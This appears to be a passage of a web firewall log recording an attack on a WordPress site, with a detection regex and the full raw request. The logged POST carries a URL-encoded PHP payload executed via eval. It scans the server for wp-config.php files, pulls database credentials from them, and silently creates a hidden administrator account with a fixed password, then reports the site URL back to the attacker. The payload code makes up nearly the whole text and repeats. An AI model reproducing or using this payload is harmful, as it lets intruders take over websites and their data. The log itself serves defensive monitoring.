s%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:10:10","213.209.159.254","POST","\/wp-includes\/class-wp-term.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> CmArqm:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/class-wp-term.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12663\nsec-fetch-site:none\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-mode:navigate\n\nCmArqm=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%